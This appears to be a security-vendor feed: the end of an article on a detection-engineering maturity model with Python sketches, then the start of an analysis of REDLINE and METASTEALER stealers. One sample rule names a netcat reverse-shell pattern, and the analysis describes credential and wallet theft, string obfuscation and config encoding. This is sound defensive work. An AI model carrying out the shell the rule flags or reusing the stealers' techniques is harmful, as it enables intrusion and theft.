<li>Defined: Detection and response to more than three advanced TTPs/adversaries uniquely identified and targeted based on first-party threat intelligence and internal research; 50-70% of rules cover advanced TTPs; comprehensive telemetry and flexible data ingestion for at least 70% of advanced threat detections; regular updates to advanced TTP coverage based on new threat intelligence.</li>
<li>Managed: Detection and response to over five advanced TTPs/adversaries with continuous updates and proactive measures; 70-90% of rules cover advanced TTPs with integrated telemetry and data ingestion; regular updates and feedback loops with threat intelligence teams.</li>
<li>Optimized: Real-time detection and response to advanced TTPs with automated updates and proactive coverage; 100% of rules cover advanced TTPs with continuous telemetry integration; dynamic updates and real-time feedback based on evolving threat landscapes.</li>
</ul>
</li>
</ul>
<h4>Tier 4: Expert</h4>
<p>The expert tier focuses on advanced automation, seamless integration with other security tools, and continuous improvement through regular updates and external collaboration. While proactive threat hunting is essential for maintaining a solid security posture, it complements the ruleset management process by identifying new patterns and insights that can be incorporated into detection rules. Teams implement sophisticated automation for rule updates, ensuring continuous integration of advanced detections. At Elastic, our team is constantly refining our rulesets through daily triage, regular updates, and sharing <a href="https://github.com/elastic/detection-rules/tree/main/hunting">threat hunt queries</a> in our public GitHub repository to help the community improve their detection capabilities.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image1.png" alt="DEBMM - Tier 4" title="DEBMM - Tier 4" /></p>
<h5>Criteria</h5>
<h6>Hunting in Telemetry/Internal Data</h6>
<p>Setting up queries and daily triage to hunt for new threats and ensure rule effectiveness. This applies to vendors hunting in telemetry and other teams hunting in their available datasets.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No hunting activities leading to ruleset improvement.</li>
<li>Repeatable: Occasional hunting activities with some findings.</li>
<li>Defined: Regular and systematic hunting with significant coverage findings based on the Threat Hunting Maturity Model, including findings from external validation, end-to-end testing, and malware detonations.</li>
<li>Managed: Continuous hunting activities with comprehensive documentation and integration of findings; regular feedback loops between hunting and detection engineering teams.</li>
<li>Optimized: Automated, real-time hunting with advanced analytics and machine learning; continuous documentation and proactive integration of findings to enhance detection rules.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No hunting activities conducted that lead to ruleset improvement.</li>
<li>Repeatable: Bi-weekly outcome (e.g., discovered threats, new detections based on hypotheses, etc.) from hunting workflows; less than 20% of hunting findings are documented; minimal integration of hunting results into detection rules.</li>
<li>Defined: Weekly outcome with documented improvements and integration into detection rules based on hunting results and external validation data; 50-70% of hunting findings are documented and integrated into detection rules; regular feedback loop established between hunting and detection engineering teams.</li>
<li>Managed: Daily hunting activities with comprehensive documentation and integration of findings; over 90% of hunting findings are documented and lead to updates in detection rules; continuous improvement processes based on hunting results and external validation data; regular collaboration with threat intelligence teams to enhance hunting effectiveness.</li>
<li>Optimized: Real-time hunting activities with automated documentation and integration; 100% of hunting findings are documented and lead to immediate updates in detection rules; continuous improvement with proactive measures based on advanced analytics and threat intelligence.</li>
</ul>
</li>
</ul>
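<p>A hunt of the kind described above can be as simple as a statistical outlier check over telemetry aggregates, with flagged hosts becoming leads for triage and, eventually, new detection rules. The z-score threshold and counts are illustrative.</p>

```python
# Hunting sketch: flag hosts whose daily event counts are statistical outliers,
# a simple hypothesis-driven hunt whose findings can feed new rules.

from statistics import mean, stdev

def hunt_outliers(counts_by_host, z_threshold=1.5):
    """Return hosts whose count deviates more than z_threshold std devs from the mean."""
    values = list(counts_by_host.values())
    if len(values) < 2:
        return []
    mu, sigma = mean(values), stdev(values)
    if sigma == 0:
        return []  # identical counts everywhere: nothing stands out
    return [h for h, c in counts_by_host.items() if abs(c - mu) / sigma > z_threshold]

# e.g., script-interpreter executions per host over the last day
counts = {"ws01": 12, "ws02": 9, "ws03": 14, "ws04": 11, "ws05": 210}
leads = hunt_outliers(counts)  # → ["ws05"]
```

Documenting each lead and its disposition is exactly the "findings documented and integrated into detection rules" measurement used at the higher levels.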
<h6>Continuous Improvement and Potential Enhancements</h6>
<p>Continuous improvement is vital at the expert tier, leveraging the latest technologies and methodologies to enhance detection capabilities. The &quot;Optimized&quot; levels in the different criteria across various tiers emphasize the necessity for advanced automation and the integration of emerging technologies. Implementing automation for rule updates, telemetry filtering, and integration with other advanced tools is essential for modern detection engineering. While current practices involve advanced automation beyond basic case management and SOAR (Security Orchestration, Automation, and Response), there is potential for further enhancements using emerging technologies like generative AI and large language models (LLMs). This reinforces the need for continuous adaptation and innovation at the highest tier to maintain a robust and effective security posture.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No automation.</li>
<li>Repeatable: Basic automation for rule management processes, such as ETL (Extract, transform, and load) data plumbing to enable actionable insights.</li>
<li>Defined: Initial use of generative AI to assist in rule creation and assessment. For example, AI can assess the quality of rules based on predefined criteria.</li>
<li>Managed: Advanced use of AI/LLMs to detect rule duplications and overlaps, suggesting enhancements rather than creating redundant rules.</li>
<li>Optimized: Full generative AI/LLMs integration throughout the detection engineering lifecycle. This includes using AI to continuously improve rule accuracy, reduce false positives, and provide insights on rule effectiveness.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No automated processes implemented.</li>
<li>Repeatable: Implement basic automated processes for rule management and integration; less than 30% of rule management tasks are automated; initial setup of automated deployment and version control.</li>
<li>Defined: Use of AI to assess rule quality, with at least 80% of new rules undergoing automated quality checks before deployment; 40-60% of rule management tasks are automated; initial AI-driven insights are used to enhance rule effectiveness and reduce false positives.</li>
<li>Managed: AI-driven duplication detection, with a target of reducing rule duplication by 50% within the first year of implementation; 70-80% of rule management tasks are automated; AI-driven suggestions result in a 30-50% reduction in FPs; continuous integration pipeline capturing and deploying rule updates.</li>
<li>Optimized: Comprehensive AI integration, where over 90% of rule updates and optimizations are suggested by AI, leading to a significant decrease in manual triaging of alerts and a 40% reduction in FPs; fully automated rule management and deployment processes; real-time AI-driven telemetry filtering and integration with other advanced tools.</li>
</ul>
</li>
</ul>
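<p>The duplication detection mentioned at the &quot;Managed&quot; level can be prototyped without an LLM: score pairwise similarity of rule queries and surface likely overlaps for review. Jaccard similarity over tokens is a crude stand-in for semantic comparison; the queries are illustrative.</p>

```python
# Rule-duplication detection sketch: Jaccard similarity over query tokens
# surfaces near-duplicate rules for review instead of letting redundant
# rules accumulate. Rules and threshold are illustrative.

from itertools import combinations

def jaccard(a, b):
    """Token-set Jaccard similarity of two query strings."""
    ta, tb = set(a.lower().split()), set(b.lower().split())
    return len(ta & tb) / len(ta | tb) if ta | tb else 0.0

def find_overlaps(rules, threshold=0.7):
    """Return pairs of rule names whose queries look near-duplicate."""
    return [
        (r1["name"], r2["name"])
        for r1, r2 in combinations(rules, 2)
        if jaccard(r1["query"], r2["query"]) >= threshold
    ]

rules = [
    {"name": "Netcat Reverse Shell", "query": "process where process.name == nc and args == -e"},
    {"name": "Netcat Shell (copy)", "query": "process where process.name == nc and args == -e"},
    {"name": "Sudo Abuse", "query": "process where process.name == sudo"},
]
overlaps = find_overlaps(rules)  # → [("Netcat Reverse Shell", "Netcat Shell (copy)")]
```

At the "Managed" level an AI/LLM would replace the similarity function and suggest merges; the surrounding workflow stays the same.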
<h3>Applying the DEBMM to Understand Maturity</h3>
<p>Once you understand the DEBMM and its tiers, you can begin applying it to assess and enhance your detection engineering maturity.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image4.png" alt="Maturity Progression" title="Maturity Progression" /></p>
<p>The following steps will guide you through the process:</p>
<p><strong>1. Audit Your Current Maturity Tier:</strong> Evaluate your existing detection rulesets against the criteria outlined in the DEBMM. Identify your rulesets' strengths, weaknesses, and most significant risks to help determine your current maturity tier. For more details, see the <a href="#Example-Questionnaire">Example Questionnaire</a>.</p>
<p><strong>2. Understand the Scope of Effort:</strong> Recognize the significant and sustained effort required to move from one tier to the next. As teams progress through the tiers, the complexity and depth of activities increase, requiring more resources, advanced skills, and comprehensive strategies. For example, transitioning from Tier 1 to Tier 2 involves systematic rule tuning and detailed gap analysis, while advancing to Tier 3 and Tier 4 requires robust external validation processes, proactive threat hunting, and sophisticated automation.</p>
<p><strong>3. Set Goals for Progression:</strong> Define specific goals for advancing to the next tier. Use the qualitative and quantitative measures to set clear objectives for each criterion.</p>
<p><strong>4. Develop a Roadmap:</strong> Create a detailed plan outlining the actions needed to achieve the goals. Include timelines, resources, and responsible team members. Ensure foundational practices from lower tiers are consistently applied as you progress while identifying opportunities for quick wins or significant impact by first addressing the most critical and riskiest areas for improvement.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image7.png" alt="" /></p>
<p><strong>5. Implement Changes:</strong> Execute the plan, ensuring all team members are aligned with the objectives and understand their roles. Review and adjust the plan regularly as needed.</p>
<p><strong>6. Monitor and Measure Progress:</strong> Continuously track and measure the performance of your detection rulesets against the DEBMM criteria. Use metrics and key performance indicators (KPIs) to monitor your progress and identify areas for further improvement.</p>
<p><strong>7. Iterate and Improve:</strong> Regularly review and update your improvement plan based on feedback, results, and changing threat landscapes. Iterate on your detection rulesets to enhance their effectiveness and maintain a high maturity tier.</p>
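<p>Step 1 (auditing your current tier) can be mechanized under one reasonable convention: score each criterion on the five state levels and let the weakest criterion cap the overall tier, since a single weak area limits overall maturity. The criterion scores below are illustrative.</p>

```python
# Self-audit sketch: map per-criterion state levels to an overall maturity
# level, using the weakest-link convention (an assumption, not mandated by
# the DEBMM itself). Scores are illustrative.

LEVELS = ["Initial", "Repeatable", "Defined", "Managed", "Optimized"]

def overall_level(criterion_scores):
    """criterion_scores maps criterion name -> state level; returns the lowest level."""
    return min(criterion_scores.values(), key=LEVELS.index)

scores = {
    "Reviewing Threat Landscape Changes": "Defined",
    "End-to-End Release Testing and Validation": "Defined",
    "Understanding and Documenting Gaps": "Repeatable",  # the weakest link
    "Testing and Validation (Internal)": "Defined",
}
current = overall_level(scores)  # → "Repeatable"
```

The weakest criterion also tells you where to aim the roadmap in steps 3 and 4.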
<h4>Grouping Criteria for Targeted Improvement</h4>
<p>To further simplify the process, you can group criteria into specific categories to focus on targeted improvements. For example:</p>
<ul>
<li><strong>Rule Creation and Management:</strong> Includes criteria for creating, managing, and maintaining rules.</li>
<li><strong>Telemetry and Data Quality:</strong> Focuses on improving and maintaining telemetry quality.</li>
<li><strong>Threat Landscape Review:</strong> Involves regularly reviewing and updating rules based on changes in the threat landscape.</li>
<li><strong>Stakeholder Engagement:</strong> Engaging with product owners and other stakeholders to meet detection needs.</li>
</ul>
<p>Grouping criteria allows you to prioritize activities and improvements based on your current needs and goals. This structured, focused approach helps enhance your detection rulesets and is especially beneficial for teams with multiple feature owners working in different domains toward a common goal.</p>
<h2>Conclusion</h2>
<p>Whether you apply the DEBMM to your ruleset or use it as a guide to enhance your detection capabilities, the goal is to help you systematically develop, manage, and improve your detection rulesets. By following this structured model and progressing through the maturity tiers, you can significantly enhance the effectiveness of your threat detection capabilities. Remember, security is a continuous journey; consistent improvement is essential to stay ahead of emerging threats and maintain a robust security posture. The DEBMM will support you in achieving better security and more effective threat detection. We value your feedback and suggestions on refining and enhancing the model to benefit the security community. Please feel free to reach out with your thoughts and ideas.</p>
<p>We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via <a href="https://github.com/elastic/protections-artifacts/issues">GitHub issues</a>, chat with us in our <a href="http://ela.st/slack">community Slack</a>, and ask questions in our <a href="https://discuss.elastic.co/c/security/endpoint-security/80">Discuss forums</a>!</p>
<h2>Appendix</h2>
<h3>Example Rule Metadata</h3>
<p>Below is an updated list of criteria aligned with example metadata used within Elastic; tailor it to the product you use:</p>
<table>
<thead>
<tr>
<th align="center">Field</th>
<th align="center">Criteria</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center">name</td>
<td align="center">Should be descriptive, concise, and free of typos related to the rule. Clearly state the action or behavior being detected. Validation can include spell-checking and ensuring it adheres to naming conventions.</td>
</tr>
<tr>
<td align="center">author</td>
<td align="center">Should attribute the author or organization who developed the rule.</td>
</tr>
<tr>
<td align="center">description</td>
<td align="center">Detailed explanation of what the rule detects, including the context and significance. Should be free of jargon and easily understandable. Validation can ensure the length and readability of the text.</td>
</tr>
<tr>
<td align="center">from</td>
<td align="center">Defines the time range the rule should look back from the current time. Should be appropriate for the type of detection and the expected data retention period. Validation can check if the time range is within acceptable limits.</td>
</tr>
<tr>
<td align="center">index</td>
<td align="center">Specifies the data indices to be queried. Should accurately reflect where relevant data is stored. Validation can ensure indices exist and are correctly formatted.</td>
</tr>
<tr>
<td align="center">language</td>
<td align="center">Indicates the query language used (e.g., EQL, KQL, Lucene). Should be appropriate for the type of query and the data source if multiple languages are available. Validation can confirm the language is supported and matches the query format.</td>
</tr>
<tr>
<td align="center">license</td>
<td align="center">Indicates the license under which the rule is provided. Should be clear and comply with legal requirements. Validation can check against a list of approved licenses.</td>
</tr>
<tr>
<td align="center">rule_id</td>
<td align="center">Unique identifier for the rule. Should be a UUID to ensure uniqueness. Validation can ensure the rule_id follows UUID format.</td>
</tr>
<tr>
<td align="center">risk_score</td>
<td align="center">Numerical value representing the severity or impact of the detected behavior. Should be based on a standardized scoring system. Validation can check the score against a defined range.</td>
</tr>
<tr>
<td align="center">severity</td>
<td align="center">Descriptive level of the rule's severity (e.g., low, medium, high). Should align with the risk score and organizational severity definitions. Validation can ensure consistency between risk score and severity.</td>
</tr>
<tr>
<td align="center">tags</td>
<td align="center">List of tags categorizing the rule. Should include relevant domains, operating systems, use cases, tactics, and data sources. Validation can check for the presence of required tags and their format.</td>
</tr>
<tr>
<td align="center">type</td>
<td align="center">Specifies the type of rule (e.g., eql, query). Should match the query language and detection method. Validation can ensure the type is correctly specified.</td>
</tr>
<tr>
<td align="center">query</td>
<td align="center">The query logic used to detect the behavior. Should be efficient, accurate, and tested for performance with fields validated against a schema. Validation can include syntax checking and performance testing.</td>
</tr>
<tr>
<td align="center">references</td>
<td align="center">List of URLs or documents that provide additional context or background information. Should be relevant and authoritative. Validation can ensure URLs are accessible and from trusted sources.</td>
</tr>
<tr>
<td align="center">setup</td>
<td align="center">Instructions for setting up the rule. Should be clear, comprehensive, and easy to follow. Validation can check for completeness and clarity.</td>
</tr>
<tr>
<td align="center">creation_date</td>
<td align="center">Date when the rule was created. Should be in a standardized format. Validation can ensure the date is in the correct format.</td>
</tr>
<tr>
<td align="center">updated_date</td>
<td align="center">Date when the rule was last updated. Should be in a standardized format. Validation can ensure the date is in the correct format.</td>
</tr>
<tr>
<td align="center">integration</td>
<td align="center">List of integrations that the rule supports. Should be accurate and reflect all relevant integrations. Validation can ensure integrations are correctly listed.</td>
</tr>
<tr>
<td align="center">maturity</td>
<td align="center">Indicates the maturity level of the rule (e.g., experimental, beta, production). Should reflect the stability and reliability of the rule. Validation can check against a list of accepted maturity levels. Note: While this field is not explicitly used in Kibana, it’s beneficial to track rules of different maturities in the rule format stored locally in VCS.</td>
</tr>
<tr>
<td align="center">threat</td>
<td align="center">List of MITRE ATT&amp;CK tactics, techniques, and subtechniques related to the rule. Should be accurate and provide relevant context. Validation can check for correct mapping to MITRE ATT&amp;CK.</td>
</tr>
<tr>
<td align="center">actions</td>
<td align="center">List of actions to be taken when the rule is triggered. Should be clear and actionable. Validation can ensure actions are feasible and clearly defined.</td>
</tr>
<tr>
<td align="center">building_block_type</td>
<td align="center">Type of building block rule if applicable. Should be specified if the rule is meant to be a component of other rules. Validation can ensure this field is used appropriately.</td>
</tr>
<tr>
<td align="center">enabled</td>
<td align="center">Whether the rule is currently enabled or disabled. Validation can ensure this field is correctly set.</td>
</tr>
<tr>
<td align="center">exceptions_list</td>
<td align="center">List of exceptions to the rule. Should be comprehensive and relevant. Validation can check for completeness and relevance.</td>
</tr>
<tr>
<td align="center">version</td>
<td align="center">Indicates the version of the rule (integer, semantic version, etc.) to track changes. Validation can ensure the version follows a consistent format.</td>
</tr>
</tbody>
</table>
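<p>Several of the validation checks described above are straightforward to automate. The following sketch (a hypothetical helper, with field names mirroring the table and severity bands chosen purely for illustration) validates that <code>rule_id</code> is a UUID, that the date fields follow a standardized format, and that <code>severity</code> is consistent with <code>risk_score</code>:</p>

```python
import uuid
from datetime import datetime

# Hypothetical severity bands; tailor these to your organization's scoring system.
SEVERITY_BANDS = {"low": range(0, 22), "medium": range(22, 48),
                  "high": range(48, 74), "critical": range(74, 101)}

def validate_rule(rule: dict) -> list[str]:
    """Return a list of metadata validation errors (an empty list means valid)."""
    errors = []
    try:
        uuid.UUID(rule["rule_id"])  # rule_id must be a UUID
    except (KeyError, ValueError):
        errors.append("rule_id is missing or not a valid UUID")
    for field in ("creation_date", "updated_date"):
        try:
            datetime.strptime(rule[field], "%Y/%m/%d")  # standardized date format
        except (KeyError, ValueError):
            errors.append(f"{field} is missing or not in YYYY/MM/DD format")
    # severity must be consistent with the numeric risk_score
    band = SEVERITY_BANDS.get(rule.get("severity", ""))
    if band is None or rule.get("risk_score") not in band:
        errors.append("severity does not match risk_score")
    return errors
```

<p>A CI job can run such checks against every rule stored in VCS and fail the build on any non-empty error list.</p>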
<h3>Example Questionnaire</h3>
<h4>1. Identify Threat Landscape</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Do you regularly review the top 5 threats your organization faces? (Yes/No)</li>
<li>Are relevant tactics and techniques identified for these threats? (Yes/No)</li>
<li>Is the threat landscape reviewed and updated regularly? (Yes - Monthly/Yes - Quarterly/Yes - Annually/No)</li>
<li>Have any emerging threats been recently identified? (Yes/No)</li>
<li>Is there a designated person responsible for monitoring the threat landscape? (Yes/No)</li>
<li>Do you have data sources that capture relevant threat traffic? (Yes/Partial/No)</li>
<li>Are critical assets likely to be affected by these threats identified? (Yes/No)</li>
<li>Are important assets and their locations documented? (Yes/No)</li>
<li>Are endpoints, APIs, IAM, network traffic, etc. in these locations identified? (Yes/Partial/No)</li>
<li>Are critical business operations identified and their maintenance ensured? (Yes/No)</li>
<li>If in healthcare, are records stored in a HIPAA-compliant manner? (Yes/No)</li>
<li>If using cloud, is access to cloud storage locked down across multiple regions? (Yes/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Establish a regular review cycle for threat landscape updates.</li>
<li>Engage with external threat intelligence providers for broader insights.</li>
</ul>
<h4>2. Define the Perfect Rule</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are required fields for a complete rule defined? (Yes/No)</li>
<li>Is there a process for documenting and validating rules? (Yes/No)</li>
<li>Is there a clear process for creating new rules? (Yes/No)</li>
<li>Are rules prioritized for creation and updates based on defined criteria? (Yes/No)</li>
<li>Are templates or guidelines available for rule creation? (Yes/No)</li>
<li>Are rules validated for a period before going into production? (Yes/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Develop and standardize templates for rule creation.</li>
<li>Implement a review process for rule validation before deployment.</li>
</ul>
<h4>3. Define the Perfect Ruleset</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Do you have baseline rules needed to cover key threats? (Yes/No)</li>
<li>Are major threat techniques covered by your ruleset? (Yes/Partial/No)</li>
<li>Is the effectiveness of the ruleset measured? (Yes - Comprehensively/Yes - Partially/No)</li>
<li>Do you have specific criteria used to determine if a rule should be included in the ruleset? (Yes/No)</li>
<li>Is the ruleset maintained and updated? (Yes - Programmatic Maintenance &amp; Frequent Updates/Yes - Programmatic Maintenance &amp; Ad hoc Updates/Yes - Manual Maintenance &amp; Frequent Updates/Yes - Manual Maintenance &amp; Ad Hoc Updates/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Perform gap analysis to identify missing coverage areas.</li>
<li>Regularly update the ruleset based on new threat intelligence and feedback.</li>
</ul>
<h4>4. Maintain</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are rules reviewed and updated regularly? (Yes - Monthly/Yes - Quarterly/Yes - Annually/No)</li>
<li>Is there a version control system in place? (Yes/No)</li>
<li>Are there documented processes for rule maintenance? (Yes/No)</li>
<li>How are changes to the ruleset communicated to stakeholders? (Regular Meetings/Emails/Documentation/No Communication)</li>
<li>Are there automated processes for rule updates and validation? (Yes/Partial/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Implement version control for all rules.</li>
<li>Establish automated workflows for rule updates and validation.</li>
</ul>
<h4>5. Test &amp; Release</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are tests performed before rule deployment? (Yes/No)</li>
<li>Is there a documented validation process? (Yes/No)</li>
<li>Are test results documented and used to improve rules? (Yes/No)</li>
<li>Is there a designated person responsible for testing and releasing rules? (Yes/No)</li>
<li>Are there automated testing frameworks in place? (Yes/Partial/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Develop and maintain a testing framework for rule validation.</li>
<li>Document and review test results to continuously improve rule quality.</li>
</ul>
<h4>6. Criteria Assessment</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are automated tools, including generative AI, used in the rule assessment process? (Yes/No)</li>
<li>How often are automated assessments conducted using defined criteria? (Monthly/Quarterly/Annually/Never)</li>
<li>What types of automation or AI tools are integrated into the rule assessment process? (List specific tools)</li>
<li>How are automated insights, including those from generative AI, used to optimize rules? (Regular Updates/Ad hoc Updates/Not Used)</li>
<li>What metrics are tracked to measure the effectiveness of automated assessments? (List specific metrics)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Integrate automated tools, including generative AI, into the rule assessment and optimization process.</li>
<li>Regularly review and implement insights from automated assessments to enhance rule quality.</li>
</ul>
<h4>7. Iterate</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>How frequently is the assessment process revisited? (Monthly/Quarterly/Annually/Never)</li>
<li>What improvements have been identified and implemented from previous assessments? (List specific improvements)</li>
<li>How is feedback from assessments incorporated into the ruleset? (Regular Updates/Ad hoc Updates/Not Used)</li>
<li>Who is responsible for iterating on the ruleset based on assessment feedback? (Designated Role/No Specific Role)</li>
<li>Are there metrics to track progress and improvements over time? (Yes/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Establish a regular review and iteration cycle.</li>
<li>Track and document improvements and their impact on rule effectiveness.</li>
</ul>
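<p>To make the questionnaire actionable, the answers in each category can be weighted and averaged, with totals mapped to maturity tiers. The sketch below uses hypothetical weights and tier thresholds; tailor both to your own assessment criteria:</p>

```python
# Hypothetical answer weights; adjust to your assessment criteria.
ANSWER_WEIGHTS = {
    "Yes": 1.0, "Partial": 0.5, "No": 0.0,
    "Yes - Monthly": 1.0, "Yes - Quarterly": 0.75, "Yes - Annually": 0.5,
}

def category_score(answers: list[str]) -> float:
    """Average the weighted answers for one questionnaire category (0.0 - 1.0)."""
    return sum(ANSWER_WEIGHTS.get(a, 0.0) for a in answers) / len(answers)

def maturity_tier(score: float) -> str:
    """Map a category score to a hypothetical maturity tier."""
    if score >= 0.9:
        return "Tier 3"
    if score >= 0.6:
        return "Tier 2"
    if score >= 0.3:
        return "Tier 1"
    return "Tier 0"
```

<p>Scoring the same questionnaire on each review cycle gives a simple, trackable metric for the iteration step.</p>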
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/debmm.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Globally distributed stealers]]></title>
            <link>https://www.elastic.co/es/security-labs/globally-distributed-stealers</link>
            <guid>globally-distributed-stealers</guid>
            <pubDate>Fri, 24 May 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article describes our analysis of the top malware stealer families, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>This article describes our analysis of the top Windows malware stealer families that we’ve identified, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly. Additionally, we’ll examine our unique telemetry to offer insights about the current volume associated with these prevalent malware stealer families.</p>
<p>Mitigating this kind of covert threat requires a multi-faceted approach consistent with defense-in-depth principles. We will likewise describe various techniques for detection, including the use of ES|QL hunting queries and YARA rules, which empower organizations to proactively defend against these threats.</p>
<h2>Telemetry overview</h2>
<p>The telemetry data showcased in this article encompasses insights gathered from both internal and external sources, providing a comprehensive understanding of threat activity.</p>
<p>Notably, between 2022 and 2023, REDLINE emerged as the most prevalent malware in the wild, closely trailed by AGENT TESLA, VIDAR, and then STEALC. It's worth highlighting that this period marked the debut of STEALC in the wild, indicative of evolving threat landscapes.</p>
<p>In the subsequent time frame, spanning from 2023 to 2024, there was a notable spike in AGENT TESLA activity, followed by REDLINE, STEALC, and VIDAR, reflecting shifting trends in malware prevalence and distribution.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image6.png" alt="Telemetry data May 2023 - May 2024" />
Elastic telemetry data May 2023 - May 2024</p>
<p>Despite fluctuations in general malware prevalence, AGENT TESLA has consistently maintained its position as a prominent threat. This enduring dominance can be attributed to several factors, including its relatively low price point and enticing capabilities, which appeal to a wide range of threat actors, particularly those operating with limited resources or expertise.</p>
<p>A noteworthy observation: because METASTEALER is built on REDLINE, certain METASTEALER samples may inadvertently be categorized as REDLINE.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image5.png" alt="METASTEALER triggering REDLINE signatures" /></p>
<h2>Top stealers overview</h2>
<h3>REDLINE (REDLINE STEALER)</h3>
<p><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer">REDLINE</a> made its debut in the threat landscape in 2020, leveraging email as its initial distribution method; it operates on a Malware-as-a-Service (MaaS) model, making it accessible to a wide range of threat actors. Its affordability and availability in underground forums have contributed to its popularity among cybercriminals.</p>
<p>The latest operations of REDLINE involve multiple infection vectors, including email phishing, malicious websites hosting seemingly legitimate applications, and social engineering tactics. Our researchers analyzed a recent sample <a href="https://x.com/vxunderground/status/1634713832974172167">reported by vx-underground</a> indicating a campaign targeting engineers on the freelancing platform Fiverr. This tactic poses significant risks, potentially leading to the compromise of companies through unsuspecting freelancers.</p>
<p>REDLINE is built on the .NET framework, which provides it with portability and ease of implementation. It has a variety of functionalities aimed at gathering vital system information and extracting sensitive data:</p>
<ul>
<li>System information acquisition:</li>
<li>Collects essential system details such as UserName, Language, and Time Zone</li>
<li>Retrieves hardware specifics including processor and graphic card information</li>
<li>Monitors running processes and identifies installed browsers</li>
<li>Data extraction:</li>
<li>Targets browser data repositories, extracting saved passwords, credit card details, cookies, and auto-fill entries</li>
<li>Procures VPN login credentials for unauthorized access</li>
<li>Logs user credentials and chat histories from platforms like Discord and Telegram</li>
<li>Identifies and steals cryptocurrency wallets, potentially compromising valuable digital assets:</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image13.png" alt="REDLINE collecting system information" /></p>
<p>REDLINE uses a string obfuscation technique to hinder analysis and evade string-based detections (such as YARA rules) by dynamically constructing its strings at runtime from arrays of characters:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image4.png" alt="REDLINE string obfuscation" /></p>
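<p>To illustrate the technique (with hypothetical values, not actual REDLINE code): a sensitive string never appears as a literal in the binary, only as an array of character codes that is reassembled at runtime, so static string scans come up empty:</p>

```python
# Instead of embedding "Login Data" as a literal (visible to strings/YARA scans),
# the binary stores an array of character codes and rebuilds the string at runtime.
OBFUSCATED = [76, 111, 103, 105, 110, 32, 68, 97, 116, 97]  # hypothetical example

def build_string(char_codes: list[int]) -> str:
    """Reassemble a string from its character codes at runtime."""
    return "".join(chr(c) for c in char_codes)

# The literal "Login Data" never appears in the binary's data section;
# it only exists in memory after build_string() runs.
```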
<p>Its configuration is structured within a static class containing four public fields: <code>IP</code>, <code>ID</code>, <code>Message</code>, and an XOR key. The contents of the <code>IP</code> and <code>ID</code> fields are encrypted using XOR encryption and then encoded in base64, as depicted below:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image3.png" alt="REDLINE's configuration" /></p>
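<p>Recovering the <code>IP</code> and <code>ID</code> values from a sample is then a matter of reversing that chain: base64 decode the field, then XOR the result with the sample’s key. A minimal sketch, using a hypothetical key and value rather than real sample data:</p>

```python
import base64
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def decrypt_field(encoded: str, xor_key: str) -> str:
    """Reverse the REDLINE-style config encoding: base64 decode, then XOR."""
    return xor_bytes(base64.b64decode(encoded), xor_key.encode()).decode()

def encrypt_field(plaintext: str, xor_key: str) -> str:
    """Forward direction, shown here only to demonstrate the round trip."""
    return base64.b64encode(xor_bytes(plaintext.encode(), xor_key.encode())).decode()
```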
<h3>METASTEALER</h3>
<p><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer">METASTEALER</a> emerged in 2022, initially advertised as a derivative of REDLINE with additional features. Our malware analysts recently encountered a METASTEALER sample within a campaign masquerading as Roblox, previously <a href="https://x.com/CERT_OPL/status/1767191320790024484">reported by CERT Orange Polska</a>.</p>
<p>METASTEALER is primarily developed using the .NET framework, facilitating its compatibility with Windows environments and enabling ease of implementation. Certain versions employ obfuscation methods, including obscuring the control flow of the malware and making it more challenging to detect or analyze.</p>
